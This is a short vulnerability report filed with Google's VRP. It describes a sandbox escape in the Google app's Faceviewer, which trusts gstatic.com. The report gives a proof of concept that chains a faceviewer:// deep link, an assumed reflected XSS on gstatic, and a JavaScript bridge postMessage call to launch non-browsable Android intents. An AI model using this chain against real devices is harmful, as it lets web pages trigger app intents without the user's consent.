Summary:
Faceviewer wrongly trusting gstatic.com
Program:
Google VRP
URL:
https://play.google.com/store/apps/details?id=com.google.android.googlequicksearchbox
Vulnerability type:
Sandbox Escape
Details
Create this link replacing <xss> with a url reflected xss of
*.gstatic.com
<a href="faceviewer://arvr.google.com/faceviewer?arbi=1&wturl=https://ssl.gstatic.com/<xss>">tap</a>
Create a test app with a non-browsable intent for example.
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<data android:scheme="testintent" />
</intent-filter>
From the top level gstatic page run the following.
faceViewerWebXBridge.postMessage(JSON.stringify({cmd: btoa(':\x0F\n\rtestintent://')}));
Attack scenario
An attacker can abuse bugs in non-web exposed android intents from the web.
While this does need a xss on gstatic, this is not considered a security issue so (hopefully) I can assume it exists. (postMessage one does not sure about url)